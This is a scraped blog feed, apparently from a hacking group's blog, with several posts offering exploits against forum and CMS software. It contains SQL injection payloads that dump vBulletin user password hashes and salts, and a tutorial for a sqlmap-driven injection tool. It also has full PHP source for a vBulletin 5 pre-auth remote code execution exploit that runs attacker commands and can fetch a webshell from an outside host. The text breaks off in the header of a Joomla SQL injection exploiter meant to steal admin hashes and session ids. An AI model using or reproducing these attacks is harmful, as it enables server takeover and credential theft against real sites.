<div class="line number9 index8 alt2">
<code class="text plain">////////////////////////</code></div>
<div class="line number10 index9 alt1">
<code class="text plain">/// Overview:</code></div>
<div class="line number11 index10 alt2">
<code class="text plain">////////////////////////</code></div>
<div class="line number12 index11 alt1">
<code class="text spaces"> </code> </div>
<div class="line number13 index12 alt2">
<code class="text plain">VBulletin version 3.6.0 through 4.2.3 are vulnerable to SQL injection vulnerability in vBulletin core forumrunner addon. </code></div>
<div class="line number14 index13 alt1">
<code class="text plain">Vulnerability was analized and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/) </code></div>
<div class="line number15 index14 alt2">
<code class="text plain">so credit goes to Dantalion only :) </code></div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="text spaces"> </code> </div>
<div class="line number18 index17 alt1">
<code class="text spaces"> </code> </div>
<div class="line number19 index18 alt2">
<code class="text spaces"> </code> </div>
<div class="line number20 index19 alt1">
<code class="text plain">////////////////</code></div>
<div class="line number21 index20 alt2">
<code class="text plain">/// POC ////</code></div>
<div class="line number22 index21 alt1">
<code class="text plain">///////////////</code></div>
<div class="line number23 index22 alt2">
</div>
<div class="line number24 index23 alt1">
<code class="text plain">SQL Injection payload to enumerate table names</code></div>
<div class="line number25 index24 alt2">
<code class="text plain">----------------------------------------------</code></div>
<div class="line number26 index25 alt1">
<code class="text plain">http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union
select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from
(information_schema.tables)where (table_schema=database()) and (0x00) in
(@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -</code></div>
<div class="line number27 index26 alt2">
</div>
<div class="line number28 index27 alt1">
</div>
<div class="line number29 index28 alt2">
<code class="text plain">SQL Injection payload to enumerate column names from table "user"</code></div>
<div class="line number30 index29 alt1">
<code class="text plain">----------------------------------------------------------------</code></div>
<div class="line number31 index30 alt2">
<code class="text plain">http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union
select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from
(information_schema.columns)where (table_name=0x75736572) and (0x00) in
(@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -</code></div>
<div class="line number32 index31 alt1">
</div>
<div class="line number33 index32 alt2">
</div>
<div class="line number34 index33 alt1">
<code class="text plain">SQL Injection payload to enumerate username,password hash and salt from "user" table</code></div>
<div class="line number35 index34 alt2">
<code class="text plain">----------------------------------------------------------------------------------</code></div>
<div class="line number36 index35 alt1">
<code class="text plain">http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union
select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from
(user)where (0x00) in
(@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10--
-</code></div>
<div class="line number37 index36 alt2">
</div>
<div class="line number38 index37 alt1">
<code class="text plain">/////////////////</code></div>
<div class="line number39 index38 alt2">
<code class="text plain">exploit code ends here</code></div>
<div class="line number40 index39 alt1">
<code class="text spaces"> </code> </div>
<div class="line number41 index40 alt2">
<code class="text spaces"> </code> </div>
<div class="line number42 index41 alt1">
<code class="text spaces"> </code> </div>
<div class="line number43 index42 alt2">
<code class="text spaces"> </code> </div>
<div class="line number44 index43 alt1">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1">
<code class="text plain">#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash</code></div>
<div class="line number50 index49 alt1">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,</code></div>
<div class="line number53 index52 alt2">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<div class="line number54 index53 alt1">
<code class="text spaces"> </code><code class="text plain">--==[[ Special Fuck goes to ]]==--</code></div>
<div class="line number55 index54 alt2">
<code class="text spaces"> </code><code class="text plain"><3 suriya Cyber Tyson <3</code></div>
</div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com1tag:blogger.com,1999:blog-6893238704654067208.post-20193714221235680802016-06-03T19:08:00.000+05:302016-06-03T19:08:08.777+05:30SQL_Injector Version-2 by incredible<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
<div style="text-align: justify;">
I
am here with Advanced version of SQL_Inj3ct0r. In this version I have
added few more functionality to the tool. We will see what are these
functionality in this post.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Previously
released SQL_Inj3ct0r was a simple php script integrated with sqlmap
and was able to perform SQL injection by 'get method' only. For details
and usage of the previous script, please visit following link :</div>
<div style="text-align: justify;">
<a href="http://mannulinux.blogspot.in/2015/08/sqlinj3ct0r_17.html" target="_blank">http://mannulinux.blogspot.in/2015/08/sqlinj3ct0r_17.html</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This version of SQL_Inj3ct0r is having two more method by which you can exploit you target using SQL injection. </div>
<div style="text-align: justify;">
1. Via Post method </div>
<div style="text-align: justify;">
2. Using file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Download link :</u></div>
<div style="text-align: justify;">
<span style="color: blue;"><span style="color: #3d85c6;">You can download this script "Advanced SQL_Inj3ct0r" from here :</span></span></div>
<div style="text-align: justify;">
<a href="https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v2.php" target="_blank">SQL-Injector v2</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Usage:</u> </div>
<div style="text-align: justify;">
Please refer following screenshot as manual of the script:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1.
You will get this modules shown in the screenshot on first access of
'Advanced_injector.php'. You can download sqlmap here. if you already
have sqlmap , simply set that's location using "Set" button.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42LUATnMDUDsA2g6easOHHVzFT892Rk5kvCVmVOzW6A8YXibPFwjdzlD3KeY2LjF71inWtaHwzYPSd6ECq07gqYp886rqX9nYPBJMtC3zMEiHRlWOGVZjPh4XYc4dQ7AHUwOgqVZMuA4/s1600/1downloadsqlmap.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42LUATnMDUDsA2g6easOHHVzFT892Rk5kvCVmVOzW6A8YXibPFwjdzlD3KeY2LjF71inWtaHwzYPSd6ECq07gqYp886rqX9nYPBJMtC3zMEiHRlWOGVZjPh4XYc4dQ7AHUwOgqVZMuA4/s1600/1downloadsqlmap.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
2.
If you download the sqlmap, SQL_Inject0r will show the location of
sqlmap. Simply type the path in input box as shown and hit "Set". Refer
screenshot below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheWK468ztOGsTaKYPQAtac_TrbMDWsPsSNkwU7rEfRuWcXIT4fk9Xlg2pQjcyQBsQqK_T4otlUvZcR4DJKvKXC1-R_Invi-zDf_nvoAyraU21EECpxPw2DS4xbN09hPzRllMRFoW3046A/s1600/2afterdownload.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheWK468ztOGsTaKYPQAtac_TrbMDWsPsSNkwU7rEfRuWcXIT4fk9Xlg2pQjcyQBsQqK_T4otlUvZcR4DJKvKXC1-R_Invi-zDf_nvoAyraU21EECpxPw2DS4xbN09hPzRllMRFoW3046A/s1600/2afterdownload.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3.
After setting the location you will be redirected to following main
module where you get 4 options ( i.e 'GET Method' , 'POST Method' ,
'Inject using file'), for injecting the target via 3 different method
and one option for generating a file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you want do changes on path/location of sqlmap, You may use "Reset SQLMAP path" button as shown in the screenshot.</div>
<div style="text-align: justify;">
for reference :</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwjpw-K-sX72NkEIGb9EuaOX3iDNm3j59c5Lt35c0I8DEwPrmYY-QTOXw7DRmHyDQnzX3EuPukmlS4C9nGhKFm0Gh3A1aqLNlH6PArZSLgRBk37LCGJ4_KuBoH9u_uBaWgfptwybmGuGM/s1600/3homemodule.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwjpw-K-sX72NkEIGb9EuaOX3iDNm3j59c5Lt35c0I8DEwPrmYY-QTOXw7DRmHyDQnzX3EuPukmlS4C9nGhKFm0Gh3A1aqLNlH6PArZSLgRBk37LCGJ4_KuBoH9u_uBaWgfptwybmGuGM/s1600/3homemodule.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV-CeKGZfqm2XwUanOzaQHYH2tUvcry1oNgMLnkfiN_Xr9CVXQ_ytgKxoe5mfc_DgT5eLYeFelvS1K65j6NwESj42bygi-7UsM3fR1R7NS7SKWXyssDEOuz78n5t3Lg9FS9fsXuDKlDSY/s1600/3homemodule.png" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
4.
You may proceed with any of the method out of three in order to inject
your target. To know complete exploitation method through 'Inject via
get method' you may have a look on previous version of SQL_Inject0r:
refer this <b><a href="https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v1.php" target="_blank">Link</a></b><br />
<br />
<span style="color: white;"><b>a) Injecting target using GET Method.</b></span><br />
Exploitation 'Level' , 'Risk' and 'Technique' is also implemented in newer version of Inject0r<br />
you
can set any value for 'Level'(from 1 to 5) and Risk( from 1-3). If you
don't specify the value, SQL_Inject0r proceed for exploitation with
their default values.<br />
For exploitation technique ( depending on SQL injection type ) you can choose any out of 5.<br />
Following type of SQL injections can be performed using Inject0r:<br />
<span style="color: white;"><span style="background-color: black;">(i) Union based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(ii) Error based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(iii) Boolean based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(iv) Time based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(v) Stack query based SQLi</span></span><br />
<br />
Please refer following screenshot: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWJ2YplhrCuo8t9Efql67zUXyob74_EVnOSklS6tJ0mZNiRrFCeSHW8HsihrpJs1kwMQ9E8g_rY09-Xzij9T_evhftVYByBbAACmPrXzOZduTELK_lV6eT-IE-JFlteao1dNfjNz5BEm8/s1600/4getmethod.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWJ2YplhrCuo8t9Efql67zUXyob74_EVnOSklS6tJ0mZNiRrFCeSHW8HsihrpJs1kwMQ9E8g_rY09-Xzij9T_evhftVYByBbAACmPrXzOZduTELK_lV6eT-IE-JFlteao1dNfjNz5BEm8/s1600/4getmethod.png" /></a></div>
<br />
<span style="background-color: black;"><span style="color: white;"><b>b) Injecting target using POST Method.</b></span></span><br />
In this module you have to provide vulnerable URL and POST parameters in input boxes as shown in following screenshot: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgemhBPrJ8D0sf93OXTN7GHPIAW7hCK8A-OT_iQZ7Pu_eQo5ETKs25Ar_HHYMO5JBjg1I5Ttco85SrLFjbqWugXaJbQ1W0nn82vlnZFBnL6JTx7BpJL5wYujgYLapVyNWpv_Lh5ZQF4cKE/s1600/5postparameter.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgemhBPrJ8D0sf93OXTN7GHPIAW7hCK8A-OT_iQZ7Pu_eQo5ETKs25Ar_HHYMO5JBjg1I5Ttco85SrLFjbqWugXaJbQ1W0nn82vlnZFBnL6JTx7BpJL5wYujgYLapVyNWpv_Lh5ZQF4cKE/s1600/5postparameter.png" /></a></div>
<br />
After that, set Level and Risk, select your exploitation technique and hit "Exploit" button.<br />
<br />
<br />
<span style="background-color: black;"><span style="color: white;"><b>c) Generating a file.</b></span></span><br />
Using
this module you can generate a txt file which contains the request
header. this file will be used to inject the target through "Inject
using file" module.<br />
To generate the file you need to provide a
name for file with .txt extension and need the paste the request header
in text area,as shown in screenshot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1xdF8cJOBLlv288dQPCf7_bMRo5A-_LbytuddLdI36x9OoU4TIRkvFNu0AZrTRAwB7oVttgi3dlzhvCsmcI9QlmeGYu0ENG9TGECoCjc5wTeRyJ0jcWm3Mam1vw0Xf4pdvSDRY-Xdls/s1600/6genfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1xdF8cJOBLlv288dQPCf7_bMRo5A-_LbytuddLdI36x9OoU4TIRkvFNu0AZrTRAwB7oVttgi3dlzhvCsmcI9QlmeGYu0ENG9TGECoCjc5wTeRyJ0jcWm3Mam1vw0Xf4pdvSDRY-Xdls/s1600/6genfile.png" /></a></div>
<br />
After
pasting the request header, hit "Generate File" button. SQL_Inject0r
will generate the file with same name you have given, in current working
directory. Refer following screenshot:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixroMefJawTeW2uglwwvzdOqFWEqnr-ItAxCFldydsTk8AlvVkwDMiapcP-44ydD2e-jVikpalOA4MGE3hhlZHGxFj-3LkEWxZAz1M5QykE5LE4i4GwEd6hQf7l6z0nOJoCGnuO_sJuCY/s1600/6.1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixroMefJawTeW2uglwwvzdOqFWEqnr-ItAxCFldydsTk8AlvVkwDMiapcP-44ydD2e-jVikpalOA4MGE3hhlZHGxFj-3LkEWxZAz1M5QykE5LE4i4GwEd6hQf7l6z0nOJoCGnuO_sJuCY/s1600/6.1.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="background-color: black;"><span style="color: white;">d) Inject target using file.</span></span></b></div>
<div style="text-align: justify;">
In
this module you can use the generated file to inject your target.
Simply type the filename in text box, set level, risk, technique (if you
wish to) and go for "Exploit".</div>
<div style="text-align: justify;">
Refer following screenshots:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I
am using 'sqli-audi lab' again to demonstrate the usage of the
SQL_Inject0r_v2 as I used this for previous Inject0r. From 'Step2'
complete exploitation process with be same for all of three the modules.</div>
<div style="text-align: justify;">
Full demonstration of the "inject using file" module: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="background-color: black;"><b>Step1: </b></span>Provide DB filename in text box and click on "Exploit" button.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp6dfZa7X4oF2EsUVqdHQIkH1g3h8vO4T_Tc4JRR6HwFLuDVgbkDKTegdNZdSvDjDkLmSqnYMXPTIbL96IQHeCX7T7VBzsNpTCjX0iuWl6yUDhgU2T_po0MFPXZcrnqKA-LUSKXvDhmk/s1600/7injectfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp6dfZa7X4oF2EsUVqdHQIkH1g3h8vO4T_Tc4JRR6HwFLuDVgbkDKTegdNZdSvDjDkLmSqnYMXPTIbL96IQHeCX7T7VBzsNpTCjX0iuWl6yUDhgU2T_po0MFPXZcrnqKA-LUSKXvDhmk/s1600/7injectfile.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Step 2:</b> You will get the names of all the existing databases. Select the
database name you wish and proceed to extract table_name from selected
database. Refer screenshot: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-gBPALW7evbFvwNTLNJnAESIQ6JbkgUAhazuGWF88A4eTJkWzEN7VnkMAr-MOoj87KmdVDiUGAfRQCPxmTg_8CbJPxsT0PAhxWlHeN2q2af2wUUwUuKp9hzQ8w3mAVsHHXIceVuquIrA/s1600/7.1injectfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-gBPALW7evbFvwNTLNJnAESIQ6JbkgUAhazuGWF88A4eTJkWzEN7VnkMAr-MOoj87KmdVDiUGAfRQCPxmTg_8CbJPxsT0PAhxWlHeN2q2af2wUUwUuKp9hzQ8w3mAVsHHXIceVuquIrA/s1600/7.1injectfile.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<b>Step3:</b>
You will get all the tables present on the selected database. Type one
of the table name in input box,of which you want to get the data and
click on "Extract Columns" button. Refer screenshot below: </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDb7i74R_Q6hK3aMFbUDlaUU2rKr3M0-osbKvhJsD1eP9-X7Oc2zPan7QW81EfYoM5ErsjM7zBz5jcb6vXcvuJgdfjZbWdO724wTwxuI6jD9uDIgdLk9fzW6oOdvzOccPDDsb7MbmIliI/s1600/tables.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDb7i74R_Q6hK3aMFbUDlaUU2rKr3M0-osbKvhJsD1eP9-X7Oc2zPan7QW81EfYoM5ErsjM7zBz5jcb6vXcvuJgdfjZbWdO724wTwxuI6jD9uDIgdLk9fzW6oOdvzOccPDDsb7MbmIliI/s1600/tables.png" /></a></div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Step 4:</b>
After getting the columns name, you can proceed to dump the data from
columns. Type columns name separating them with comma(,) to get the
data inside the column and click on "Dump_Data".</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9hbEgJ2M50Niujz0gGyCWSolhOKLP3VnDHmJ1OmTs2jWyYc68oJlquP0wp72lMYdKXG4iS_OF_84PUBQKBR_5QuiPCTWUx2flik9gqf5uvLB6spTkHFUxQ4iUVEAEh8WlvcvZHEZO-kk/s1600/colunms.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9hbEgJ2M50Niujz0gGyCWSolhOKLP3VnDHmJ1OmTs2jWyYc68oJlquP0wp72lMYdKXG4iS_OF_84PUBQKBR_5QuiPCTWUx2flik9gqf5uvLB6spTkHFUxQ4iUVEAEh8WlvcvZHEZO-kk/s1600/colunms.png" /></a></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<b>Step 5:</b> Finally, you will get the data inside the columns.</div>
<div style="text-align: justify;">
Reference image:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXQrTfDSnYhz00Jb7FyS9HfDfkx8IvAisdN7-P44lzm2lwh9BUnIO6zhYzCi4ZeYnsly_PYho8y3iM1zEsMW85meBcLlWBsV2dY9VS7mWD8GEc96XBfQ-iIrB-uf9lRF_wbiiGDStSyk8/s1600/data.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXQrTfDSnYhz00Jb7FyS9HfDfkx8IvAisdN7-P44lzm2lwh9BUnIO6zhYzCi4ZeYnsly_PYho8y3iM1zEsMW85meBcLlWBsV2dY9VS7mWD8GEc96XBfQ-iIrB-uf9lRF_wbiiGDStSyk8/s1600/data.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
So this is the SQL_Inject0r_v2 with some more functionalities.</div>
<div style="text-align: justify;">
I hope this description will help you to use the script. :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thank you.</div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-48822616129977981882015-11-17T11:57:00.000+05:302015-11-17T11:57:09.173+05:30VB 5 preauth RCE (Remote code execution) exploit<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all _/\_<br />
<br />
this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz) <br /><br />script is developed by someone else<br />
<br />
just type target forum link and in command box type whatever command you want to execute,<br />
syntax is system('your_command');<br />
like ls<br />
so type system('ls');<br />
if you want to execute whoami command type system('whoami');<br />
<br />Enjoy<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg749CYNNC-mcGR1vX9_mmDMWzgQtiKu9YYCtu2nWnbRXgQvJ56aqGJ_CM9FYrbKpsq6uur1zeBC9mMVHOQ3khy0c-JkhcBSlt0qrvmh-xM9PUzuwPRUhn-HRlV8AjMwAFUryrKEWIBUxo/s1600/vb+exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg749CYNNC-mcGR1vX9_mmDMWzgQtiKu9YYCtu2nWnbRXgQvJ56aqGJ_CM9FYrbKpsq6uur1zeBC9mMVHOQ3khy0c-JkhcBSlt0qrvmh-xM9PUzuwPRUhn-HRlV8AjMwAFUryrKEWIBUxo/s1600/vb+exploit.png" /></a></div>
<br />
source code is<br />
//////////code starts<br />
<br />
<?php<br /><br />/*<br />Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman<br />*/<br />if (isset($_POST['target'])) {<br />$host = $_POST['target'];<br /> $path = '/ajax/api/hook/decodeArguments?arguments='; <br />class vB_Database {<br />public $functions = array();<br /><br />public function __construct()<br />{<br />$this->functions['free_result'] = 'assert';<br />}<br />}<br />class vB_dB_Result {<br />protected $db;<br />protected $recordset;<br /><br />public function __construct()<br />{<br />if(isset($_POST['command'])) {<br />$command = $_POST['command'];<br />} else if (isset($_POST['shell'])) {<br />$command = 'system(wget http://b374k.webshell-archive.org/b374k.txt)';<br />} else {<br />echo 'Choose One Option';<br />}<br />//echo $command."<br>";<br />$this->db = new vB_Database();<br />$this->recordset = $command;<br />}<br />}<br />$payload = urlencode(serialize(new vB_dB_Result()));<br />echo $url = $host.$path.$payload;<br />$curl = curl_init();<br />curl_setopt ($curl, CURLOPT_URL, $url);<br />curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);<br />$result = curl_exec ($curl);<br />curl_close ($curl);<br />print $result;<br />} else {<br />echo '<body bgcolor="black"><br /><div align="center"><br /><form action="" method="POST"><br /><font color="green"><br /><h1>VBulletin 5.x.x PreAuth Remote Code Execution Exploit</h1><br />Enter Your Hostname example(http://www.vulnerablesite.com/vbulletin/)<br><br><br /><input type=text name=target value="target.com"><br><brs><br /><h2>Execute A Command</h2><br /><br />Enter Your command <input type="text" name="command"><br /><br /><br /><input type="submit"><br /><h2>Drop A Shell</h2><br /><input type="submit" value="Shell" name="shell"><br /></font><br /></form><br /></div><br /></body>';<br />}<br />?><br />
<br />
<br />
//////code ends here </div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-8936059797795415212015-10-28T11:38:00.000+05:302015-11-17T12:18:52.964+05:30Joomla SQL Injection exploiter (Version 3.2.* to 3.4.4)<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all bhai ji _/\_<br />
Today i am going to share a simple PHP script which exploit SQL injection vulnerability in Joomla having version 3.2.* to 3.4.4<br />
<br />
Just upload this script on your localhost (Must have PHP curl enabled in it)<br />
Specify target name and run<br />
if target is vulnerable, script will extract admin username, password hash and also admin session id (if super admin is logged in)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ix7zDmnR66OQxySnvxqQ1gsF4HP7sTXOnzqfVZ2iJ3w0nean0LzSd1BrlyBg-iuQL1Dldlb4QG9TNzULaYtrdjk7PUHAcHON5GRXGwHl6chJueokMBP3GRHSNAV6RMd_ple-SlqgGIo/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ix7zDmnR66OQxySnvxqQ1gsF4HP7sTXOnzqfVZ2iJ3w0nean0LzSd1BrlyBg-iuQL1Dldlb4QG9TNzULaYtrdjk7PUHAcHON5GRXGwHl6chJueokMBP3GRHSNAV6RMd_ple-SlqgGIo/s1600/joomla.png" /></a></div>
<br />
code is given below<br />
///////////////////////////////// code starts here<br />
<br />
<?php <br />
session_start();<br />
error_reporting(0);<br />
set_time_limit(0);<br />
/* Coded By Manish At Indishell Lab*/<br />
$head = '<br />
<html><br />
<head><br />
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/><br />
</script><br />
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title><br />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br />
<br />
<STYLE><br />
body {<br />
font-family: Tahoma;<br />
color: white;<br />
background: #444444;<br />
}<br />
<br />
input {<br />
border : solid 2px ;<br />
border-color : black;<br />
BACKGROUND-COLOR: #444444;<br />
font: 8pt Verdana;<br />
<br />
color: white;<br />
}<br />
<br />
submit {<br />
BORDER: buttonhighlight 2px outset;<br />
BACKGROUND-COLOR: Black;<br />
width: 30%;<br />
color: #FFF;<br />
}<br />
<br />
#t input[type=\'submit\']{<br />
COLOR: White;<br />
border:none;<br />
BACKGROUND-COLOR: black;<br />
}<br />
<br />
#t input[type=\'submit\']:hover {<br />
<br />
BACKGROUND-COLOR: #ff9933;<br />
color: black;<br />
<br />
}<br />
tr {<br />
BORDER: dashed 1px #333;<br />
color: #FFF;<br />
}<br />
td {<br />
BORDER: dashed 0px ;<br />
}<br />
.table1 {<br />
BORDER: 0px Black;<br />
BACKGROUND-COLOR: Black;<br />
color: #FFF;<br />
}<br />
.td1 {<br />
BORDER: 0px;<br />
BORDER-COLOR: #333333;<br />
font: 7pt Verdana;<br />
color: Green;<br />
}<br />
.tr1 {<br />
BORDER: 0px;<br />
BORDER-COLOR: #333333;<br />
color: #FFF;<br />
}<br />
table {<br />
BORDER: dashed 2px #333;<br />
BORDER-COLOR: #333333;<br />
BACKGROUND-COLOR: #191919;;<br />
color: #FFF;<br />
}<br />
textarea {<br />
border : dashed 2px #333;<br />
BACKGROUND-COLOR: Black;<br />
font: Fixedsys bold;<br />
color: #999;<br />
}<br />
A:link {<br />
border: 1px;<br />
COLOR: red; TEXT-DECORATION: none<br />
}<br />
A:visited {<br />
COLOR: red; TEXT-DECORATION: none<br />
}<br />
A:hover {<br />
color: White; TEXT-DECORATION: none<br />
}<br />
A:active {<br />
color: white; TEXT-DECORATION: none<br />
}<br />
</STYLE><br />
<script type="text/javascript"><br />
<!--<br />
function lhook(id) {<br />
var e = document.getElementById(id);<br />
if(e.style.display == \'block\')<br />
e.style.display = \'none\';<br />
else<br />
e.style.display = \'block\';<br />
}<br />
//--><br />
</script><br />
'; <br />
<br />
<br />
<br />
echo $head ;<br />
echo '<br />
<br />
